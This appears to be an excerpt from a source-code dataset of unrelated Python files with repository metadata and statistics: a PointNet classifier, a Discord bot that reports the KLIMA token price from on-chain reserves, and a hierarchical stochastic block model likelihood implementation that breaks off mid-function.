| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
89652e0cdf60affecd26292ef2ffa540a293d51b
| 75
|
py
|
Python
|
grid/app/main/routes/__init__.py
|
sachin-101/PyGrid
|
b8d3c360cf4ae447ead199f72fda7fd74c5ed79e
|
[
"Apache-2.0"
] | null | null | null |
grid/app/main/routes/__init__.py
|
sachin-101/PyGrid
|
b8d3c360cf4ae447ead199f72fda7fd74c5ed79e
|
[
"Apache-2.0"
] | null | null | null |
grid/app/main/routes/__init__.py
|
sachin-101/PyGrid
|
b8d3c360cf4ae447ead199f72fda7fd74c5ed79e
|
[
"Apache-2.0"
] | 1
|
2021-07-06T04:30:51.000Z
|
2021-07-06T04:30:51.000Z
|
from .sfl.routes import *
from .dfl.routes import *
from .general import *
| 18.75
| 25
| 0.733333
| 11
| 75
| 5
| 0.545455
| 0.436364
| 0.581818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 75
| 3
| 26
| 25
| 0.873016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
897693fce29e73bf0178881bdf6afb39110a1eb6
| 1,574
|
py
|
Python
|
models/pointnet_cls.py
|
hnVfly/pointnet.mxnet
|
1d214a687bdddf488167204ad787d1a8b0770556
|
[
"MIT"
] | 2
|
2018-08-30T11:57:19.000Z
|
2018-08-31T01:44:06.000Z
|
models/pointnet_cls.py
|
hnVfly/pointnet.mxnet
|
1d214a687bdddf488167204ad787d1a8b0770556
|
[
"MIT"
] | null | null | null |
models/pointnet_cls.py
|
hnVfly/pointnet.mxnet
|
1d214a687bdddf488167204ad787d1a8b0770556
|
[
"MIT"
] | null | null | null |
from mxnet import nd
from mxnet.gluon import nn
from models.pointnet_globalfeat import PointNetfeat
from models.pointnet_globalfeat import PointNetfeat_vanilla
class PointNetCls_vanilla(nn.Block):
def __init__(self, num_points=2500, k=2, routing=None):
super(PointNetCls_vanilla, self).__init__()
self.num_points = num_points
self.feat = PointNetfeat_vanilla(num_points, global_feat=True, routing=routing)
self.fc1 = nn.Dense(512)
self.fc2 = nn.Dense(256)
self.fc3 = nn.Dense(k)
self.dp = nn.Dropout(.7)
self.bn1 = nn.BatchNorm(in_channels=512)
self.bn2 = nn.BatchNorm(in_channels=256)
def forward(self, x):
x, trans = self.feat(x)
x = nd.relu(self.bn1(self.fc1(x)))
x = nd.relu(self.bn2(self.fc2(x)))
x = self.dp(x)
x = self.fc3(x)
return x, trans
class PointNetCls(nn.Block):
def __init__(self, num_points=2500, k=2, routing=None):
super(PointNetCls, self).__init__()
self.num_points = num_points
self.feat = PointNetfeat(num_points, global_feat=True, routing=routing)
self.fc1 = nn.Dense(512)
self.fc2 = nn.Dense(256)
self.fc3 = nn.Dense(k)
self.dp = nn.Dropout(.7)
self.bn1 = nn.BatchNorm(in_channels=512)
self.bn2 = nn.BatchNorm(in_channels=256)
def forward(self, x):
x, trans = self.feat(x)
x = nd.relu(self.bn1(self.fc1(x)))
x = nd.relu(self.bn2(self.fc2(x)))
x = self.dp(x)
x = self.fc3(x)
return x, trans
| 34.977778
| 87
| 0.623253
| 231
| 1,574
| 4.090909
| 0.203463
| 0.021164
| 0.046561
| 0.071958
| 0.895238
| 0.895238
| 0.797884
| 0.797884
| 0.797884
| 0.797884
| 0
| 0.047297
| 0.247776
| 1,574
| 45
| 88
| 34.977778
| 0.750845
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
89884681e1054ef492cbfc8911f147d6e91a5f58
| 301
|
py
|
Python
|
impl/multiply/__init__.py
|
cmrudolph/algorithms
|
3097d0082094ade4de654b342db09be22e2917ba
|
[
"MIT"
] | null | null | null |
impl/multiply/__init__.py
|
cmrudolph/algorithms
|
3097d0082094ade4de654b342db09be22e2917ba
|
[
"MIT"
] | null | null | null |
impl/multiply/__init__.py
|
cmrudolph/algorithms
|
3097d0082094ade4de654b342db09be22e2917ba
|
[
"MIT"
] | null | null | null |
from .multiply import (c_long,
c_recursive,
py_builtin,
adapt_benchmark_args,
adapt_run_args)
__all__ = [
'c_long',
'c_recursive',
'py_builtin',
'adapt_benchmark_args',
'adapt_run_args'
]
| 21.5
| 44
| 0.488372
| 28
| 301
| 4.607143
| 0.464286
| 0.077519
| 0.093023
| 0.232558
| 0.837209
| 0.837209
| 0.837209
| 0.837209
| 0.837209
| 0.837209
| 0
| 0
| 0.431894
| 301
| 13
| 45
| 23.153846
| 0.754386
| 0
| 0
| 0
| 0
| 0
| 0.202658
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.083333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
98adc8f7b956fd8d3b9dfbd91b0183aa69d9ba29
| 17,802
|
py
|
Python
|
src/klima_price/main.py
|
0xJem/discord-bots
|
46ce60e9e64ba0643f8dbb15a4970a68482a4813
|
[
"MIT"
] | 1
|
2021-12-24T03:05:43.000Z
|
2021-12-24T03:05:43.000Z
|
src/klima_price/main.py
|
frankTurtle/discord-bots
|
376527ad32537b303a4718a525369df2f513cf2a
|
[
"MIT"
] | null | null | null |
src/klima_price/main.py
|
frankTurtle/discord-bots
|
376527ad32537b303a4718a525369df2f513cf2a
|
[
"MIT"
] | null | null | null |
import os
import json
from web3 import Web3
import discord
from discord.ext import commands, tasks
BOT_TOKEN = os.environ["DISCORD_BOT_TOKEN"]
# Initialized Discord client
intents = discord.Intents.all()
intents.members = True
client = commands.Bot(intents=intents, help_command=None, command_prefix='&?')
# Initialize web3
project_id = os.environ['WEB3_INFURA_PROJECT_ID']
polygon_mainnet_endpoint = f'https://polygon-mainnet.infura.io/v3/{project_id}'
web3 = Web3(Web3.HTTPProvider(polygon_mainnet_endpoint))
assert(web3.isConnected())
def lp_contract_info(sushi_address, basePrice=1):
address = Web3.toChecksumAddress(sushi_address)
abi = json.loads('[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Burn","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1","type":"uint256"}],"name":"Mint","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint112","name":"reserve0","type":"uint112"},{"indexed":false,"internalType":"uint112","name":"reserve1","type":"uint112"}],"name":"Sync","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DOMAIN_SEPARATOR","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MINIMUM_LIQUIDITY","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"PERMIT_TYPEHASH","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"}],"name":"burn","outputs":[{"internalType":"uint256","name":"amount0","type":"uint256"},{"internalType":"uint256","name":"amount1","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"factory","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getReserves","outputs":[{"internalType":"uint112","name":"_reserve0","type":"uint112"},{"internalType":"uint112","name":"_reserve1","type":"uint112"},{"internalType":"uint32","name":"_blockTimestampLast","type":"uint32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_token0","type":"address"},{"internalType":"address","name":"_token1","type":"address"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"kLast","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"}],"name":"mint","outputs":[{"internalType":"uint256","name":"liquidity","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"},{"internalType":"uint256","name":"deadline","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"price0CumulativeLast","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price1CumulativeLast","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"}],"name":"skim","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount0Out","type":"uint256"},{"internalType":"uint256","name":"amount1Out","type":"uint256"},{"internalType":"address","name":"to","type":"address"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"swap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sync","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"token0","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"token1","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]') # noqa: E501
sushiLP = web3.eth.contract(address=address, abi=abi)
try:
Reserves = sushiLP.functions.getReserves().call()
# usdc-bct
if sushi_address == '0x1e67124681b402064cd0abe8ed1b5c79d2e02f64':
tokenPrice = Reserves[0]*basePrice*1e12/Reserves[1]
# bct-klima
else:
tokenPrice = Reserves[0]*basePrice/(Reserves[1]*1e9)
return(tokenPrice)
except Exception:
pass
def klima_info():
address = Web3.toChecksumAddress("0x4e78011Ce80ee02d2c3e649Fb657E45898257815")
abi = json.loads('[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"previousTWAPEpochPeriod","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"newTWAPEpochPeriod","type":"uint256"}],"name":"TWAPEpochChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousTWAPOracle","type":"address"},{"indexed":true,"internalType":"address","name":"newTWAPOracle","type":"address"}],"name":"TWAPOracleChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newTWAPSource","type":"address"}],"name":"TWAPSourceAdded","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"removedTWAPSource","type":"address"}],"name":"TWAPSourceRemoved","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DOMAIN_SEPARATOR","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"PERMIT_TYPEHASH","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account_","type":"address"},{"internalType":"uint256","name":"amount_","type":"uint256"}],"name":"_burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newTWAPSourceDexPool_","type":"address"}],"name":"addTWAPSource","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account_","type":"address"},{"internalType":"uint256","name":"amount_","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newTWAPEpochPeriod_","type":"uint256"}],"name":"changeTWAPEpochPeriod","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newTWAPOracle_","type":"address"}],"name":"changeTWAPOracle","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account_","type":"address"},{"internalType":"uint256","name":"amount_","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"deadline","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"twapSourceToRemove_","type":"address"}],"name":"removeTWAPSource","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"vault_","type":"address"}],"name":"setVault","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner_","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"twapEpochPeriod","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"twapOracle","outputs":[{"internalType":"contract ITWAPOracle","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"vault","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]') # noqa: E501
klima_contract = web3.eth.contract(address=address, abi=abi)
try:
total_supply = klima_contract.functions.totalSupply().call()
return(total_supply/1e9)
except Exception:
pass
def get_info():
bct_price = lp_contract_info(sushi_address='0x1e67124681b402064cd0abe8ed1b5c79d2e02f64')
klima_price = lp_contract_info(sushi_address='0x9803c7ae526049210a1725f7487af26fe2c24614', basePrice=bct_price) # noqa: E501
supply = klima_info()
return(klima_price, supply)
@client.event
async def on_ready():
print('Logged in as {0.user}'.format(client))
if not update_info.is_running():
update_info.start()
@tasks.loop(seconds=300)
async def update_info():
price, supply = get_info()
if price is not None:
print(f'${price:,.2f} KLIMA')
print(f'Marketcap: ${price*supply/1e6:,.1f}M')
for guild in client.guilds:
guser = guild.get_member(client.user.id)
try:
await guser.edit(nick=f'${price:,.2f} KLIMA')
except discord.errors.HTTPException:
return
if supply is not None:
try:
await client.change_presence(
activity=discord.Activity(
type=discord.ActivityType.playing,
name=f'Marketcap: ${price*supply/1e6:,.1f}M'
)
)
except discord.errors.HTTPException:
return
client.run(BOT_TOKEN)
| 183.525773
| 7,663
| 0.662285
| 1,752
| 17,802
| 6.690639
| 0.123288
| 0.076011
| 0.117727
| 0.079338
| 0.800119
| 0.786555
| 0.749616
| 0.679918
| 0.656714
| 0.626088
| 0
| 0.03179
| 0.036962
| 17,802
| 96
| 7,664
| 185.4375
| 0.651948
| 0.00528
| 0
| 0.176471
| 0
| 0.029412
| 0.870226
| 0.861751
| 0
| 0
| 0.009492
| 0
| 0.014706
| 1
| 0.044118
| false
| 0.029412
| 0.073529
| 0
| 0.147059
| 0.044118
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7f4a1f54cb53c4f2cb4e60edbc97d732443fdf42
| 9,921
|
py
|
Python
|
pysbm/sbm/peixotos_hierarchical_sbm_full.py
|
DM2-ND/CFLP
|
c3e29a73fc9e0779e4bcfd5fefcc314df959351f
|
[
"Apache-2.0"
] | 13
|
2021-06-07T04:29:39.000Z
|
2022-03-25T05:58:33.000Z
|
pysbm/sbm/peixotos_hierarchical_sbm_full.py
|
DM2-ND/CFLP
|
c3e29a73fc9e0779e4bcfd5fefcc314df959351f
|
[
"Apache-2.0"
] | 2
|
2021-11-04T02:26:05.000Z
|
2021-11-22T17:55:01.000Z
|
pysbm/sbm/peixotos_hierarchical_sbm_full.py
|
DM2-ND/CFLP
|
c3e29a73fc9e0779e4bcfd5fefcc314df959351f
|
[
"Apache-2.0"
] | 2
|
2021-06-10T17:12:31.000Z
|
2022-01-11T15:47:09.000Z
|
# Implementation based on the following publication of Tiago P. Peixoto
# Nonparametric Bayesian inference of the microcanonical stochastic block model
# full version with scipy
import math
from scipy.special import binom
from .peixotos_flat_sbm_full import ModelLikelihoodOfFlatMicrocanonicalDegreeCorrectedSbm
from .peixotos_hierarchical_sbm_tools_full import BINOMIALS
from .nxpartitiongraphbased import NxHierarchicalPartition
# ---------------------------
# Hierarchical Version
# ---------------------------
# @formatter:off
class ModelLikelihoodOfHierarchicalMicrocanonicalDegreeCorrectedSbm(
ModelLikelihoodOfFlatMicrocanonicalDegreeCorrectedSbm):
def calculate_complete_uniform_hyperprior_undirected(self, hierarchy_partition):
saved_level = hierarchy_partition.actual_level
hierarchy_partition.actual_level = 0
probability = 1
probability *= self._calculate_p_adjacency_undirected(hierarchy_partition)
probability *= self._calculate_p_degree_sequence_uniform_hyperprior_undirected(hierarchy_partition)
probability *= self._calculate_p_edge_counts_hierarchy_undirected(hierarchy_partition)
hierarchy_partition.actual_level = saved_level
return probability
def calculate_complete_uniform_undirected(self, hierarchy_partition):
saved_level = hierarchy_partition.actual_level
hierarchy_partition.actual_level = 0
probability = 1
probability *= self._calculate_p_adjacency_undirected(hierarchy_partition)
probability *= self._calculate_p_degree_sequence_uniform_undirected(hierarchy_partition)
probability *= self._calculate_p_edge_counts_hierarchy_undirected(hierarchy_partition)
hierarchy_partition.actual_level = saved_level
return probability
def calculate_complete_non_degree_corrected_undirected(self, hierarchy_partition):
saved_level = hierarchy_partition.actual_level
hierarchy_partition.actual_level = 0
probability = 1
probability *= self._calculate_non_degree_corrected_undirected(hierarchy_partition)
probability *= self._calculate_p_edge_counts_hierarchy_undirected(hierarchy_partition)
hierarchy_partition.actual_level = saved_level
return probability
@staticmethod
def _calculate_p_edge_counts_hierarchy_undirected(hierarchy_partition):
"""
Formulas
P({e_l}|{b_l}) = \prod_{l=1}^L P(e_l| e_{l+1}, b_l)
P(e_l| e_{l+1}, b_l) = \prod_{r<s} (( n_r^l*n_s^l e_{rs}^{l+1} ))^{-1}
* \prod_r (( n_r^l*(n_r^l + 1)/2 e_{rr}^{l+1}/2 ))^{-1}
P({b_l}) = \prod_{l=1}^L P(b_l)
with P(b_l) as above
P(b_l) = \prod_r n^l_r! / B_{l-1}! * \nCr{B_{l-1}-1, B_l-1)^{-1} * 1/B_{l-1}
and boundary condition B_0 = N
:param hierarchy_partition:
:type hierarchy_partition NxHierarchicalPartition
:return:
"""
# Notation with e_{rs}^{l+1} a little bit confusing, it is the number of edges between group n_r^l and n_s^l
# which we save here in level l at edge_count(r,s)
probability = 1
number_of_blocks = 1
for level in hierarchy_partition.iter_levels():
hierarchy_partition.actual_level = level
number_of_blocks = hierarchy_partition.B
for r in range(number_of_blocks):
n_r = hierarchy_partition.get_number_of_nodes_in_block(r)
for s in range(r + 1, number_of_blocks):
n_s = hierarchy_partition.get_number_of_nodes_in_block(s)
temp = hierarchy_partition.get_edge_count(r, s)
binomial_values = (n_r * n_s + temp - 1, temp)
if binomial_values not in BINOMIALS:
BINOMIALS[binomial_values] = binom(*binomial_values)
probability /= BINOMIALS[binomial_values]
# second product
temp = hierarchy_partition.get_edge_count(r, r) / 2
binomial_values = (n_r * (n_r + 1) / 2 + temp - 1, temp)
if binomial_values not in BINOMIALS:
BINOMIALS[binomial_values] = binom(*binomial_values)
probability /= BINOMIALS[binomial_values]
probability *= math.factorial(n_r)
# group independent terms of last product
number_of_blocks_below = hierarchy_partition.get_number_of_blocks_in_level(level - 1)
probability /= math.factorial(number_of_blocks_below)
binomial_values = (number_of_blocks_below - 1, number_of_blocks - 1)
if binomial_values not in BINOMIALS:
BINOMIALS[binomial_values] = binom(*binomial_values)
probability /= BINOMIALS[binomial_values]
probability /= number_of_blocks_below
# add last hierarchy level (singleton B_L = 1 not included in hierarchy partition)
number_of_blocks_below = number_of_blocks
binomial_values = (
number_of_blocks_below * (number_of_blocks_below + 1) / 2 + hierarchy_partition.edge_total - 1,
hierarchy_partition.edge_total)
if binomial_values not in BINOMIALS:
BINOMIALS[binomial_values] = binom(*binomial_values)
probability /= BINOMIALS[binomial_values]
# next factor \prod_r n_r^L!/B_{L-1}! is always one (n_r^L = n_1^L = B_{L-1})
# next factor simplifies to 1 too, because binomial above 0 is always 1
# and last factor
probability /= number_of_blocks_below
return probability
# ----------------------------------
# directed Versions
# ----------------------------------
def calculate_complete_uniform_hyperprior_directed(self, hierarchy_partition):
saved_level = hierarchy_partition.actual_level
hierarchy_partition.actual_level = 0
probability = 1
probability *= self._calculate_p_adjacency_directed(hierarchy_partition)
probability *= self._calculate_p_degree_sequence_uniform_hyperprior_directed(hierarchy_partition)
probability *= self._calculate_p_edge_counts_hierarchy_directed(hierarchy_partition)
hierarchy_partition.actual_level = saved_level
return probability
def calculate_complete_uniform_directed(self, hierarchy_partition):
saved_level = hierarchy_partition.actual_level
hierarchy_partition.actual_level = 0
probability = 1
probability *= self._calculate_p_adjacency_directed(hierarchy_partition)
probability *= self._calculate_p_degree_sequence_uniform_directed(hierarchy_partition)
probability *= self._calculate_p_edge_counts_hierarchy_directed(hierarchy_partition)
hierarchy_partition.actual_level = saved_level
return probability
def calculate_complete_non_degree_corrected_directed(self, hierarchy_partition):
saved_level = hierarchy_partition.actual_level
hierarchy_partition.actual_level = 0
probability = 1
probability *= self._calculate_non_degree_corrected_directed(hierarchy_partition)
probability *= self._calculate_p_edge_counts_hierarchy_directed(hierarchy_partition)
hierarchy_partition.actual_level = saved_level
return probability
@staticmethod
def _calculate_p_edge_counts_hierarchy_directed(hierarchy_partition):
"""
Formulas
P({e_l}|{b_l}) = \prod_{l=1}^L P(e_l| e_{l+1}, b_l)
P(e_l| e_{l+1}, b_l) = \prod_{r,s} (( n_r^l*n_s^l e_{rs}^{l+1} ))^{-1}
P({b_l}) = \prod_{l=1}^L P(b_l)
with P(b_l) as above
P(b_l) = \prod_r n^l_r! / B_{l-1}! * \nCr{B_{l-1}-1, B_l-1)^{-1} * 1/B_{l-1}
and boundary condition B_0 = N
:param hierarchy_partition:
:type hierarchy_partition NxHierarchicalPartition
:return: probability
"""
probability = 1
number_of_blocks = 1
for level in hierarchy_partition.iter_levels():
hierarchy_partition.actual_level = level
number_of_blocks = hierarchy_partition.B
for r in range(number_of_blocks):
n_r = hierarchy_partition.get_number_of_nodes_in_block(r)
for s in range(number_of_blocks):
n_s = hierarchy_partition.get_number_of_nodes_in_block(s)
temp = hierarchy_partition.get_edge_count(r, s)
